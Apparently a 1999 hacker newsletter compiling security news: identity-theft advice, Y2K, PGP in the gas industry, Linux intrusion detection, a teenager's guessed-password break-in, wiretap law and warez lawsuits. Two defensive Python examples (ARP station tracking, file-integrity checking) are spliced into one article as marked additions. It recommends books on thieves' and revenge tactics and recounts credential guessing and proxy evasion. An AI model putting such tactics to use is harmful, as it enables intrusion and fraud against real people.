By far, the biggest opportunity for an identity thief is not by digging through your trash or overhearing your phone number. Instead, the best time for a thief to garner precious information is during a move. The situation provides such a ripe opportunity for an attacker to pick up box after box of identity-defining information such as birth certificates, social security numbers, paycheck stubs, credit card numbers, and other personal effects. Together, these belongings represent ample means for an attacker to obtain a driver's license, passport, and credit card.

We've accumulated a small collection of helpful hints to prevent identity theft. Start by purchasing a cross-cut shredder for your home and business: Every document you throw away should be carefully reviewed for sensitive information. Never freely give out information such as address, phone number, or driver's license number -- and never give out your social security number (unless required to). Once your awareness is heightened, you'll be surprised at how many people ask you for these personal items. Obtain a post office box, and use it whenever someone requires an address. Using your credit card over the Internet is fine, just be sure the Web site employs SSL for card number encryption.
To get a handle on identity theft, you should also read Identity Theft: the Cybercrime of the Millennium, by John Q. Newman, and 21st Century Revenge: Down and Dirty Tactics for the Millennium, by Victor Santori. Both books are from Loompanics Unlimited and give you a solid foundation on the techniques used by thieves.

All this is little help to those who have already fallen victim to an attack. Here's what you can do after turning into a statistic.

- Inform the three main credit-reporting bureaus -- Equifax, Experian, and Trans Union -- by phone and letter. Ask that no new credit be approved without your notification beforehand.

- Inform all of your current credit card and loan companies about the theft.

- Inform all of the check-monitoring agencies, such as CheckRite, Chexsystems, etc.

- Make sure your police department files a report on the crime, or your future identity-theft claims may fall on deaf ears.

- Obtain a new driver's license, and inform the department of motor vehicles that you suspect identity fraud.

- As a last resort, especially if the thief has used your social security number to obtain credit in your name, request a new social security number. However, be careful with this step because it can make it difficult for you to get credit in the future.

The physical security of one's identity is as critical as any virtual electronic bits and bytes floating through a silicon wafer or a copper wire. As more of the components of physical identity become translated into digital form, the two will become intrinsically intertwined.

For more details on identity theft, visit www.identitytheft.org, www.privacyrights.org, and www.futurecrime.com. Send your anecdotes and precautions to security_watch@infoworld.com.

@HWA

18.0 Y2K-THE MOVIE
     ~~~~~~~~~~~~~

From http://www.net-security.org/
by BHZ, Tuesday 17th August 1999 on 1:53 am CET

Nice theme for a film - Y2K. NBC will use millennium madness and try to earn money on it.
In Y2K, the bug causes an East Coast power outage, ATM failures, airliners whose instruments don't work and other assorted calamities. The main character battles one of the biggest imagined consequences of the bug when a nuclear power plant threatens to go into meltdown.

@HWA

19.0 19 ARRESTED ON CHILD PORNOGRAPHY CHARGES
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/
by BHZ, Tuesday 17th August 1999 on 1:45 am CET

The National Criminal Intelligence Service started a unit that will try to catch on-line pedophiles and similar perverts. Insp Terry Jones, the head of the squad, said that the unit monitored a few chat rooms for 60 hours - and as a result they arrested 19 suspects. In addition to pedophiles, the unit will investigate some other criminal activities conducted via computers (for instance illegal gambling, blackmail, industrial espionage).

Note: read the ACPO (www.antichildporn.org) article in Default #1 here.
http://default.net-security.org/1/14.htm

XIV. Guest column
-----------------

This week's guest column is by Natasha Grigori of the ACPO, a cause which Help Net Security supports fully.

The mission of ACPO, and our goals:

ACPO is a non-profit Group formed to actively seek out and stop the exploitation of children on the Internet. Our focus is to protect our children from the predatory and perverse criminal elements that seek to destroy their innocence. While we are firmly in favor of free speech in all its forms, especially on the Internet, we are opposed to the active sexual exploitation of children. We have chosen to act against the dissemination of child pornography over the Internet. Our motivation is the fact that there is a genuine connection between the distribution and acceptance of pedophile pornography and actual incidents of sexually abused children. Not to mention that all existing hardcore pedophile pornographic material is the result of very real abuse.
Our children are our future, as such we must protect them as we would our own lives and in doing so ensure a better future for us all.

Our secondary focus is to educate. We want to provide individuals and organizations training about the Internet and its associated risks. We will counsel law enforcement on the Internet aspects of gathering information and evidence.

We pursue all of our goals with the ethical and moral values of most anybody confronted with this abhorrent practice. We will tolerate only approaches, and condone no illegal activities. Failure to abide by the ACPO operations standards is ground enough for revocation of ACPO membership.

Our goals can be broken down as follows:

1. Provide a maximum of information to concerned law enforcement authorities, including activity hotspots on the Internet and the results of our own investigations into the activities of online child pornographers.

2. Put a halt to sensationalism and hype regarding the Internet while promoting quality investigative journalism on pedophile pornography.

3. Create enough public pressure to bring authorities to the point of action.

4. Form a cooperative with other Internet groups with similar goals, which will benefit us all and increase our impact.

We are working to provide a website to which our members will be able to turn for information and resources, and will add other means of communication. Our approach is somewhat different from other organizations, in that we are combining the drive for wide public support with the knowledge of Internet experts.

This is our first public description of our mission. We view this as a work in progress that will continue to be refined. If you have any questions or concerns about our Mission Statement, please feel free to mail me at Natasha@infovlad.net

You should get a response from me within a week, possibly less. And BTW look for our exciting news next Friday.
============================
Thanks for being 'Child-Friendly'

Natasha Grigori
Founder ACPO
http://www.antichildporn.org/
http://www.infovlad.net/antichildpornorg/
mailto:natasha@infovlad.net
============================

@HWA

20.0 Y2K PROBLEMS
     ~~~~~~~~~~~~

From http://www.net-security.org/
by BHZ, Tuesday 17th August 1999 on 1:37 am CET

The Y2K situation will ruin some companies. TriMark Engineering, the small company behind the Doorway program, published on their site that: "I am happy to announce that ALL released versions of the Doorway program are y2k compliant...Unfortunately the computers used in our operations are not y2k compliant. These computers were purchased and used before Windows 95, and are all old DOS systems. They are not compliant and we do not have the resources to make them compliant".
http://execonn.com/doorway

@HWA

21.0 GISB WILL USE PGP
     ~~~~~~~~~~~~~~~~~

From http://www.net-security.org/
by BHZ, Tuesday 17th August 1999 on 1:29 am CET

The Gas Industry Standards Board (GISB) decided that for securing transactions over the Internet, they will use PGP (Pretty Good Privacy) technology rather than the more popular standard developed by RSA - S/MIME (Secure/Multipurpose Internet Mail Extension). More on the story on Internet Week.
http://www.techweb.com/se/directlink.cgi?INW19990816S0032

August 16, 1999, Issue: 777
Section: Systems & Management

Utilities Choose PGP Encryption Over S/MIME
Rutrell Yasin

Suppliers of natural gas now have a standard way of securing electronic transactions between trading partners. While the Gas Industry Standards Board joins a growing list of vertical industry consortia forming such standards, it is among the first major groups to choose PGP (Pretty Good Privacy) encryption and authentication technology rather than the more popular S/MIME (Secure/Multipurpose Internet Mail Extension) standard developed by RSA.
The GISB's decision to adopt PGP for its 165 corporate members, which include Amoco, Exxon, Mobil, Con Edison and Pennsylvania Power & Light Co., is a major endorsement for PGP. This choice came from the fact that PGP is file-based, providing data encryption for both e-mail and file-based data. Also, the group felt it was better suited for its requirements, which include data privacy, integrity, authentication and nonrepudiation. While the S/MIME standard also supports those core functions, it is intended only for e-mail encryption.

The GISB has been experimenting with PGP since 1996, before S/MIME became a standard, according to Carl Caldwell, chairman of the GISB's electronic delivery mechanism committee. GISB was looking at ways to send encrypted EDI files, using HTTP as a transport, "but at the time, SSL [Secure Sockets Layer] was owned by Netscape, and we didn't want to pick one specific Web server and browser," Caldwell said. Plus, "we needed a file-based security product."

Though S/MIME is the de facto standard for e-mail encryption and an Internet Engineering Task Force draft specification, as well, the IETF is working on AS2, a convergent standard that will let companies securely exchange EDI files, using HTTP as a transport. EDI data will be packaged in MIME messages that use public key security, Caldwell said.

PGP will help the GISB member companies secure more than 37 different types of business transactions, from ordering space on a pipeline to moving gas to paying for it once it reaches its destination, GISB officials said.

Based on GISB's choice of PGP, the Federal Energy Regulatory Commission (FERC) has mandated that all members of the gas industry implement PGP 2.6 or greater to secure electronic transactions, said Carl Caldwell, chairman of GISB's electronic delivery mechanism subcommittee.

GISB and FERC's adoption of a standard for the gas industry is a move in the right direction, said Phil Schacter, an analyst at the Burton Group.
"I like the model of a community defining [standards]."

Still, Schacter wondered whether there would be interoperability issues between companies using PGP 2.6 and those using newer versions with RSA and X.509 certificates. However, Network Associates, which acquired PGP Inc. last year and is the major supplier of PGP-based software, said it has backward-compatible versions.

From its origins as shareware software, PGP has emerged as a de facto standard for data encryption among consumer users and individuals, but not many large companies are using it on an enterprise and extranet basis. Nevertheless, under the auspices of Network Associates, PGP is evolving into a more flexible, robust product for the corporate world, industry analysts said.

Network Associates has "broadened the scope of the application, [adding] support for RSA [encryption] and X.509 digital certificates," Schacter said. PGP supports other standards, such as Secure Sockets Layer (the predecessor to the IETF-backed Transport Layer Security protocol) as well as OpenPGP and the Lightweight Directory Access Protocol. Network Associates offers an integrated suite, called PGP Enterprise Security.

PGP's broadened scope is one reason GISB is adopting the technology as a standard, said Rae McQuade, executive director of the standards organization. "We were attempting to develop a standard [that would operate] over a wide variety of hardware, operating systems and programming languages," she said.

Copyright (c) 1999 CMP Media Inc.

@HWA

22.0 SURF ANONYMOUS FOR $5
     ~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/
by BHZ, Tuesday 17th August 1999 on 1:23 am CET

Earlier this year we published that nearly 93 percent of commercial Web sites collect some type of personal data from visitors to their sites. Many privacy related companies are working on solutions that will help users to stay anonymous.
Small maker of privacy software Privada (www.privada.net) announced today their program Web Incognito, a product that will allow users to surf the Web and send e-mail anonymously.

@HWA

23.0 HACKER LAUNCHES GRUDGE-ATTACK AGAINST FORMER EMPLOYER
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/
by Thejian, Monday 16th August 1999 on 1:30 pm CET

A 23-year-old hacker was sentenced on two charges of unlawful modification of computer material and two of unauthorised access to a computer to 3 years in jail, and his computer was confiscated. Scott Reid, 23, hacked into the Vodafone short messaging network, sending a message in text form to 32,000 international subscribers telling them they had won a Peugeot 106 car and must ring a certain number to claim it. The number he quoted was that of GS (UK), a Nottingham firm supplying software for the embroidery industry, where he had previously worked. The result, Nottingham Crown Court was told, was that the firm's business was brought to a standstill, which caused an estimated 10,000 pound loss in business. Besides that he also infected the computer systems of this company with a trojan horse named "Colourmatch". It appears the attacks were carried out because of a grudge Reid had against his former employer because of a terminated project of his. This was reported in the Daily Telegraph, thanx to ladysharrow for contributing.

@HWA

24.0 PROJECTGAMMA BACK ONLINE
     ~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/
by Thejian, Monday 16th August 1999 on 1:00 pm CET

The popular underground site Project Gamma (pG) has returned after an unfortunate 30-day downtime. Darkridge Security Solution (DSS), the organization that is kind enough to provide hosting for pG, relocated their networks. After the networks relocated, it was approximately 14 days before the vhost was restored; that was the cause of the DSS Web site being displayed on the projectgamma.com domain.
Visit Projectgamma.com
http://www.projectgamma.com/

@HWA

25.0 DETECTING INTRUDERS IN LINUX
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/
by Thejian, Sunday 15th August 1999 on 11:30 pm CET

Here's an article on system intruders in Linux. Besides dealing with how to monitor your system and in this way detect the intruders, it also speaks about how to be prepared for the event your systems get compromised. Because face it, intrusions CAN happen to anyone. Read it:
http://securityportal.com/direct.cgi?/topnews/tn19990816.html

Detecting Intruders in Linux

August 16, 1999 - An intrusion into your network and host systems by persons unknown is one of the biggest nightmares for systems administrators. Many of us don't even want to think about the possibility of this happening, or feel that our perimeter security makes a serious intrusion a remote possibility. However, intrusions can happen to anyone, on any public or private network. In order to best detect and respond to an intrusion, you must first plan for an intrusion, then have all the appropriate monitoring capabilities deployed.

Plan for an intrusion

Develop a baseline of normal operating conditions. To do this, you should audit the file system, network services, logon activity, normal CPU load, disk utilization, etc. It is important to get a sense of what log files normally look like. A very skilled attacker may leave little evidence of their presence, and only a full system audit can help you detect subtle system variations later. The tools to perform audits range from the simple and familiar utilities, such as netstat, to get network statistics, and ps/top, to get CPU stats, to more complex tools, such as Tripwire and Logcheck. Tripwire takes a snapshot of your complete file system and generates an MD5 hash of the files, which can be compared with a later snapshot to find any file system variation.
Logcheck, part of the Abacus tool set, is a program that will automatically run and check system log files for security violations and unusual activity. Running these tools on a system that is in a pristine state before it is put into production can yield valuable information down the road.

Backups - the obligatory statement that solid backups are the only way to be certain that you can recover from an intrusion is inserted here. Your Red Hat Package Manager (RPM) database can be a key indicator of system tampering, so it should be backed up after package adds, deletes and changes. Also make sure you have a clean copy of the bin/rpm binary. RPM's abilities for version control and discovering file dependencies really allow it to shine in warning of file integrity problems.

Build an offline kit of standard system utilities. Depending upon how quick you are in detecting an intruder, you may or may not be able to trust normal utilities, like ls, ps, top, mount, cp, mv or grep, to help you detect tampering. A skilled attacker may substitute their own version of ls and top, for example, which conveniently filter out rogue daemons they have installed. You should have clean copies of these utilities ready to use.

Develop a response plan. A response plan can be as simple or complex as necessary, based upon the value of the systems being protected. Who gets notified, what gets shut down, how long do we have to return to normal operating status are all questions to be answered. The key benefit to ID planning is that we are reacting quickly and appropriately to an intrusion instead of wasting critical time deciding what to do. A network based denial of service attack may require that you immediately disable network services, possibly by unplugging the host from its hub. If there has been a local compromise and malicious programs are running on the host, it may need to be shut down immediately.
If this is an extremely crucial production host, response plans can get complex, but it still is usually better to shut the system down, as you may be racing against a person or program that is two steps ahead of you.

Perform Network based monitoring

One element of intrusion detection is tracking activity on your network segments. Host-based intrusion detection will tell you the attacks that reached the host and how successful they are. Network monitoring can alert you to attacks occurring throughout your network, although it may not give you information about how successful those attacks were.

Look for stations entering or leaving your network segments. Arpwatch is a utility that will track new active MAC addresses on your network segment. If you have an SNMP console at your disposal as well as manageable hubs or switches, these will also be able to spot new stations coming online on your network.

Look for network sniffers. Trying to find network sniffers may be a difficult job, as they are listening to traffic, but not transmitting anything. Neped is a utility available on Trinux that looks for stations with their NIC set to promiscuous mode, a sure sign of a sniffer. This is not a foolproof tool, but it may be able to catch some sniffers, particularly those based on an older Linux kernel. Some commercial sniffers have telltale signatures; they may broadcast a licensing packet to look for unauthorized copies of their product.

Ngrep. This is a nifty utility that you may want to run on a special management station. Ngrep uses libpcap to capture all of your network traffic and lets you use pattern matching and filtering expressions like grep to look for specific activities, such as all attempts to telnet to your web server. Be aware that modern ethernet switching can make it very difficult to see all the traffic on your network. Running ngrep on a shared hub with a specific host, or perhaps your ISP router, may allow you to capture the traffic you are looking for.
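The station tracking that arpwatch does for a segment, as an added Python example that is not part of the article and not arpwatch's own code: the ARP observations are constructed, and the event names ("new station", "changed ethernet address", "flip flop") mirror the reports arpwatch mails to the administrator.

```python
"""Arpwatch-style station tracker for one network segment.

Added example, not part of the article and not arpwatch's own code. It keeps
the same kind of database arpwatch keeps (IP address -> ethernet address,
first/last seen) and raises the events an administrator would want paged for:
'new station' when an IP is seen for the first time, 'changed ethernet
address' when a known IP turns up from a different MAC, and 'flip flop' when
it changes back to the MAC it had before (a spoofed gateway or a duplicate
address typically shows up on the wire as a flip flop).
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed ARP observations (ip, mac, unix time) as a sniffer on the
# segment would report them; not captured from a real network.
SAMPLE_ARP = [
    ("10.0.0.1", "00:50:56:aa:bb:01", 935000000),  # gateway
    ("10.0.0.7", "00:50:56:aa:bb:07", 935000010),
    ("10.0.0.1", "00:50:56:aa:bb:01", 935000020),  # gateway again, nothing new
    ("10.0.0.9", "00:50:56:aa:bb:09", 935000030),  # a host never seen before
    ("10.0.0.1", "00:50:56:dd:ee:ff", 935000040),  # gateway IP from another MAC
    ("10.0.0.1", "00:50:56:aa:bb:01", 935000050),  # ...and back again: flip flop
]

Event = Tuple[str, str, str, str]  # (kind, ip, mac, previous mac or "")


@dataclass
class Station:
    mac: str
    first_seen: int
    last_seen: int
    prev_mac: Optional[str] = None  # MAC this IP used before the last change


@dataclass
class ArpWatch:
    db: Dict[str, Station] = field(default_factory=dict)
    events: List[Event] = field(default_factory=list)

    def observe(self, ip: str, mac: str, ts: int) -> str:
        """Record one ARP observation; return the event raised, or '' if none."""
        mac = mac.lower()  # normalise so AA:BB and aa:bb compare equal
        st = self.db.get(ip)
        if st is None:
            self.db[ip] = Station(mac, ts, ts)
            self.events.append(("new station", ip, mac, ""))
            return "new station"
        if st.mac == mac:
            st.last_seen = ts  # known pairing, just refresh the timestamp
            return ""
        kind = "flip flop" if mac == st.prev_mac else "changed ethernet address"
        self.events.append((kind, ip, mac, st.mac))
        st.prev_mac, st.mac, st.last_seen = st.mac, mac, ts
        return kind


def watch(observations: List[Tuple[str, str, int]] = SAMPLE_ARP) -> List[Event]:
    """Feed observations through a fresh ArpWatch and return the events raised."""
    w = ArpWatch()
    for ip, mac, ts in observations:
        w.observe(ip, mac, ts)
    return w.events


if __name__ == "__main__":
    for kind, ip, mac, old in watch():
        tail = f" (was {old})" if old else ""
        print(f"{kind}: {ip} at {mac}{tail}")
```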
Some switches have the capability to "mirror" traffic, and send all of the data from one port to another for diagnostics purposes.

Perform Host based scanning

Running the same tools used for the baseline audit on a regularly scheduled basis is a good way to validate system integrity and look for subtle break-ins. In addition, there are utilities that you may want to run on a real time monitoring basis to find problems. Some examples:

Swatch, the Syslog Watchdog. This is a lightweight Perl program that continuously monitors SYSLOG for security issues and can dial a pager to report exceptions.

Tiger. Written by Texas A&M in response to their own security break-in, this is actually several scripts that can be scheduled to check a wide variety of possible vulnerabilities, such as weak permissions, and can also perform cleanup of scratch files that may have plain text security information in them.

Tcp_wrappers is probably the most powerful way to monitor connections to network services on your host in real time. Tcp_wrappers can log incoming connections and filter them based upon additional security criteria. Tcp_wrappers works by tricking inetd into calling it before invoking a network service, such as your telnet or ftp daemons. Tcp_wrappers then logs the connection and either passes the connection on to the appropriate service, such as telnetd, or denies the connection altogether. Tcp_wrappers takes an investment in time to get the most out of it, but is an exceptional program for providing proactive monitoring and filtering of network connections to your host.

Building secure systems is not an adequate approach to maintaining long term host security. By developing solid intrusion detection plans, performing comprehensive security audits, and scanning both network segments and host systems, we will have a much better chance at successful intruder detection.
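The Tripwire idea from the "Plan for an intrusion" section (baseline the file system while pristine, compare a later snapshot) and its scheduled re-run under host based scanning, as one added Python example that is neither Tripwire's code nor the article's: the directory tree it baselines and then tampers with is constructed in a temporary directory, and SHA-256 stands in for the MD5 the article mentions.

```python
"""Tripwire-style file integrity baseline and check.

Added example, not Tripwire's code and not from the article. It walks a
directory tree, records a content hash plus size and permission bits for every
regular file, keeps that as the baseline taken while the system is pristine,
and later diffs a fresh snapshot against it. A substituted system binary (the
altered ls/ps the article warns about), a file that appeared, one that vanished,
or a permission change all show up. SHA-256 is used where the article's
Tripwire used MD5; the technique is the same.
"""
import hashlib
import json
import os
import stat
import tempfile
from typing import Any, Dict

Snapshot = Dict[str, Dict[str, Any]]   # relative path -> {sha256, size, mode}
FIELDS = ("sha256", "size", "mode")


def hash_file(path: str) -> str:
    """SHA-256 of a file's contents, read in chunks so large binaries are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root: str) -> Snapshot:
    """Record every regular file under root (symlinks and devices are skipped)."""
    records: Snapshot = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()  # deterministic order, handy when diffing saved baselines
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):
                continue
            records[os.path.relpath(full, root)] = {
                "sha256": hash_file(full),
                "size": st.st_size,
                "mode": stat.S_IMODE(st.st_mode),
            }
    return records


def compare(baseline: Snapshot, current: Snapshot) -> Dict[str, Any]:
    """Return added and removed paths, and for changed files which fields differ."""
    report: Dict[str, Any] = {"added": [], "removed": [], "changed": {}}
    for rel in sorted(set(baseline) | set(current)):
        if rel not in baseline:
            report["added"].append(rel)
        elif rel not in current:
            report["removed"].append(rel)
        else:
            diffs = [k for k in FIELDS if baseline[rel][k] != current[rel][k]]
            if diffs:
                report["changed"][rel] = diffs
    return report


def demo() -> Dict[str, Any]:
    """Constructed scenario: baseline a tiny fake root, tamper with it, diff."""
    with tempfile.TemporaryDirectory() as root:
        bindir, etcdir = os.path.join(root, "bin"), os.path.join(root, "etc")
        os.makedirs(bindir)
        os.makedirs(etcdir)
        ls_path = os.path.join(bindir, "ls")          # stand-in for a real binary
        conf_path = os.path.join(etcdir, "inetd.conf")
        with open(ls_path, "wb") as f:
            f.write(b"#!/bin/sh\nexec /bin/ls \"$@\"\n")
        os.chmod(ls_path, 0o755)
        with open(conf_path, "w") as f:
            f.write("telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd\n")
        os.chmod(conf_path, 0o644)

        # Baseline taken while pristine; round-tripped through JSON the way a
        # saved baseline would be (keep the real one offline, as the article says).
        baseline: Snapshot = json.loads(json.dumps(snapshot(root)))

        # Tampering: ls replaced with an altered copy, a stray file dropped into
        # bin, and the inetd config made world-writable (content unchanged).
        with open(ls_path, "wb") as f:
            f.write(b"#!/bin/sh\nexec /bin/ls \"$@\" # altered\n")
        with open(os.path.join(bindir, "extra"), "w") as f:
            f.write("constructed stray file\n")
        os.chmod(conf_path, 0o666)

        return compare(baseline, snapshot(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

A real deployment would store the baseline and the checker itself on read-only or offline media, since an attacker who can alter ls can also alter a baseline left on the same disk.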
@HWA

26.0 WIRELESS CRIME-FIGHTING
     ~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/
by Thejian, Sunday 15th August 1999 on 11:00 pm CET

Two California communities are being protected by police officers with patrol car access to crime databases and records. A new wireless mobile communication and information system from PacketCluster Patrol software allows officers to do background checks in the record system securely from their cars. Crime-fighting of the future?

CNN
http://cnn.com/TECH/computing/9908/12/wirelesscop.idg/index.html

Wireless crime-fighting
August 12, 1999
Web posted at: 3:51 p.m. EDT (1951 GMT)
by Dan Caterinicchia

(IDG) -- Two California communities are being protected by police officers with patrol car access to crime databases and records, thanks to a new wireless mobile communication and information system.

PacketCluster Patrol software, produced by Cerulean Technology Inc., Marlborough, Mass., gives the Salinas/Monterey County Mobile Computer Terminal Consortium access to crime-fighting data directly from patrol car-based laptop computers.

Using the wireless network, more than 400 patrol officers in the consortium can access records management systems and county, state and federal databases. The officers can access secure information from one or more of the databases in a matter of seconds with a single query.

"To be able to share records was previously unheard of.... We couldn't do it over the radio because of the privileged nature of the information, but now officers can do background checks on the system securely, right in their cars," said Sgt. Tracy Molfino of the Salinas Police Department.

"Before, we didn't have the communication between agencies, either in person or through a third party," Molfino said. "Now we have cross-jurisdictional communication, and the whole system is progressing in an appropriate fashion."
The PacketCluster Patrol system uses wireless modems to link the consortium's 100-plus patrol cars to criminal and motor vehicle databases. Officers can communicate with each other through the system. It also provides the option of cross-referencing previous cases and arrests with variables including identification information, such as birthmarks and scars, and crime patterns in certain locations.

An unexpected bonus is that officers can run registration checks on a vehicle to see if its license plates or registration tags have been reported stolen. With the high price of tags in California, that service is being used daily, Molfino said.

The alliance has four members and will be adding eight more through a recently awarded federal grant from the Community Oriented Policing Services' Making Officer Redeployment Effective program. With its new members, the consortium plans to expand its wireless ability by integrating a geographic information system application.

"With our soon-to-be 12 members, every geographic area of Monterey County will be pulled together into one communications network," Molfino said. "The system is only about three-quarters installed, and we're already getting 10,000 queries a month."

@HWA

27.0 15-YEAR-OLD ADMITS HACKING INTO TCS
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/
by Thejian, Sunday 15th August 1999 on 6:20 pm CET

By using the password "news" along with the same username, a 15-year-old boy hacked into two Television Corporation of Singapore websites. Nice description here of how even simple password guessing can compromise a system. Full story:
http://www.straitstimes.asia1.com/cyb/cyb1_0813.html

Boy, 15, admits hacking into TCS websites
He made an educated guess at a user name "news" and used it as the password. He got into the TCS server
By PAULINE LEONG

LUCK and ingenuity enabled a 15-year-old boy to hack into two Television Corporation of Singapore (TCS) websites on the Internet.
He made an educated guess at a user name "news" and used the same word as the password. He got into the TCS server. He told another teenager, 18, about it and they both logged on several times, disrupting the web pages for about 10 hours. Yesterday, the younger boy pleaded guilty in the Juvenile Court to four charges of unauthorised entry and disclosure of password. Four other charges will be taken into consideration in his sentencing. A pre-sentence report will be submitted before the judge decides on the punishment. On June 15 this year, the Secondary 2 student was watching TV at home when he saw an advertisement showing the Internet address www.mediacity.com.sg. He decided to visit the website and used a software function in his computer to connect to the Mediacity server. After trying various combinations of user names and passwords to get into the server, he struck gold with "news". He started exploring the directories and files there. Then he told the 18-year-old whom he had met chatting on the Internet that the server had security weaknesses. He also told him the access code "news". The older boy, an O-level student in a private school, logged on, using a "wingate" to mask his identity. This is a proxy server used to avoid detection. On his advice, the younger boy also used a wingate. The older boy told him to look for more access codes, in case the system administrator disabled their "news" account. The boy found a file called "passwd" which contained all the authorised user names and their corresponding encrypted passwords. He then told the older boy the new user names and passwords, "informix" in particular, and they both used them. The younger boy was arrested seven days later at his home in Clementi. The 18-year-old has been charged. Defence lawyer David Nayar said in mitigation that the 15-year-old was curious and merely guessed at the access code "news". 
According to the lawyer, the boy did not alter any documents or files, but in his excitement, revealed the access code to another person. He added that the boy has since regretted his actions. A first offender, the 15-year-old is the younger of two boys in his family. His father is a product engineer and his mother, a housewife. They have already banned him from using the Internet. @HWA 28.0 JAPAN CLEARS WIRETAP BILL ~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Sunday 15th August 1999 on 6:00 pm CET Japan's upper house of parliament has approved a controversial bill that gives police the power to intercept communications such as telephone calls and Internet e-mail as part of their investigations into organised crime. Until now, Japan had been the only G8 nation which did not use wiretapping in the course of criminal investigations. Read more below http://www.technologypost.com/internet/DAILY/19990813103941567.asp?Section=Main Published on Friday, August 13, 1999 INTERNET Communications interception Bill clears Japan's upper house NEWSBYTES Lawmakers in Japan's upper house of parliament approved yesterday a controversial bill that gives police the power to intercept communications such as telephone calls and Internet e-mail as part of their investigations into organised crime. Having already cleared the lower house, the vote was the final hurdle to the bill becoming law. Japan had been the only G8 nation which did not use wiretapping in the course of criminal investigations. Lawmakers approved a package of three Bills designed to help police fight organised crime but it was the communications interception bill that prompted the most debate and argument. The Bill is designed to help police battle organised crime and as such restricts the interception of communications to cases involving illegal drugs, weapons, organised group illegal entry into Japan, and organised murders. Campaigners against the bill have a number of fears.
Chief among these is that it infringes on an individual's right to privacy. They also worry that police may use information intercepted that is unrelated to the crime under investigation and safeguards on the restriction of use to certain types of crime will prove ineffective. But the government supports the Bill saying it will help the police greatly in the battle against organised crime and groups like the Aum Shinrikyo religious cult that released Sarin nerve gas on the Tokyo subway in 1995. Copyright (c) Post-Newsweek Business Information, Inc. All rights reserved. @HWA 29.0 Warez Groups Hit With Racketeering Charges ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Debris Class, Paradigm, and Razor 1911 have been hit with a federal racketeering suit filed by the Interactive Digital Software Association, which is made up of six independent publishers. The IDSA has brought a wide range of charges against dozens of people across the country including copyright and trademark piracy, counterfeiting, and racketeering. Wired http://www.wired.com/news/news/buisness/story/21289.html Game Makers Take Aim at Pirates by Leander Kahney 12:45 p.m. 16.Aug.99.PDT Game companies have filed a federal racketeering suit against a nationwide ring of software pirates who methodically distributed top games, sometimes even before they were commercially available. The Interactive Digital Software Association has banded together with six major game publishers to file suit against three alleged pirate rings, known as Class, Paradigm, and Razor 1911. "These are the most sophisticated hacker groups we've run across," said Doug Lowenstein, president of the IDSA, a games industry trade group that helps investigate piracy. "They have tentacles that stretch across the world." According to Lowenstein, the three hacker groups involve hundreds of people worldwide and are capable of churning out pirated software on an industrial scale.
The suit recently filed in U.S. District Court in San Francisco names dozens of individuals from across the United States. At their height, the three groups turned out pirated copies of 100 of the most popular games every week, Lowenstein said, costing the industry millions of dollars in lost revenues. The groups are extremely well organized, capable of getting their hands on pre-production copies of popular games, cracking them, and copying them to CD in a matter of days, Lowenstein said. "These groups were responsible for a significant amount of games piracy," he said. "[This suit] won't be the end of games piracy but it's a significant action in a long war." The six publishers -- LucasArts Entertainment, Acclaim Entertainment, The 3DO Company, Infogrames, Bethesda Softworks and Interplay Entertainment -- joined the IDSA to file a wide range of charges, the most serious of which include copyright and trademark piracy, counterfeiting, and racketeering. According to the suit, the defendants operated out of San Francisco; Dallas; Minneapolis; Philadelphia; Los Angeles; Buffalo, New York; Austin, Texas; and Champaign, Illinois. Lowenstein declined to name defendants but said they had a significant number of associates overseas, possibly hundreds. The IDSA estimates worldwide piracy cost the U.S. games industry $3.2 billion in 1998. @HWA 30.0 Public UK Sites Susceptible to Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by infowar At DNSCon, held over the weekend in Blackpool England, the public web sites of the Royal Mail and the Scottish Executive were named as being vulnerable to attack. Both sites were labeled as running unpatched versions of Microsoft IIS4. Both sites have since been notified. Con organizers claimed that this implied unacceptable failures in management procedures under the Data Protection Act.
A call was also made at the con for a national UK 'Infowar Hotline' to be established where members of the public can safely report on weaknesses in the UK's national Internet and Telecomms infrastructure. DNS Con http://www.dnscon.org DNS Con Press Release http://www.hackernews.com/press/dnscon.html -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Public sector websites vulnerable to InfoWar attacks "named and shamed" at Blackpool Conference. In order to illustrate the need for a UK national InfoWar reporting hotline, some public sector websites, belonging to the Royal Mail and to the Scottish Executive were publicly "named and shamed" as being vulnerable to foreign InfoWar attackers. This announcement was made at Secondary DNS, an international Computer Security and Data Protection conference which was held at the Norbreck Castle Hotel, Blackpool, on Saturday 14th August 1999 website: http://www.dnscon.org encrypted email: infowar@dnscon.org A call was made for the establishment of a national UK InfoWar Hotline, where patriotic members of the public can safely "blow the whistle" on weaknesses in the UK's national Internet and Telecomms infrastructure, 24 hours a day, 365 days a year. These weaknesses will eventually be exploited by criminals, terrorists and other enemies of the UK, damaging our reputation for excellence in information technology, and tarnishing the trustworthiness of the UK brand name in the era of e-commerce. Both the Royal Mail htpp://www.royalmail.co.uk (and the alias http://www.viacode.co.uk) as well as the Scottish Executive (formerly the Scottish Office) http://www.scotland.gov.uk have all or part of their websites hosted on Microsoft IIS4 web servers, which have not had at least a year's worth of freely available security patches applied to them. This implies unacceptable failures in management procedures under the Data Protection Act. 
